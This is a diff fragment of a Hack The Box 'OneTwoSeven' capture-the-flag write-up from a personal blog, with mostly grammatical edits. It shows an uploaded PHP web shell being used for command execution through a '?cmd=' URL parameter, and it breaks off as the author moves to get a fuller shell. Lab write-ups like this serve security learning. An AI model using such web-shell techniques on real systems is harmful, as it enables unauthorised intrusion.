ataberk-xyz/ataberk-xyz.github.io/_posts/2019-09-02-hackthebox-onetwoseven-writeup-eng.md

 File uploaded successfull.y
 ```

 So, our filename was **onetwoseven.php**.
-Now, we can run command from following URL: ```http://saiyajin:60080/addons/onetwoseven.php?cmd=ls -la```
+Now, we can run command with following this URL: ```http://saiyajin:60080/addons/onetwoseven.php?cmd=ls -la```

 ![kingdom_rce]({{site.url}}/assets/images/onetwoseven/kingdom_rce.png)

 Okay, we got shell but it is just a web shell.
-Not even active.
-We should acquire better shell for executing commands and enumerating the system better.
+It's not even active.
+We should acquire better shell to execute commands and enumerate the system better.

 Host machine: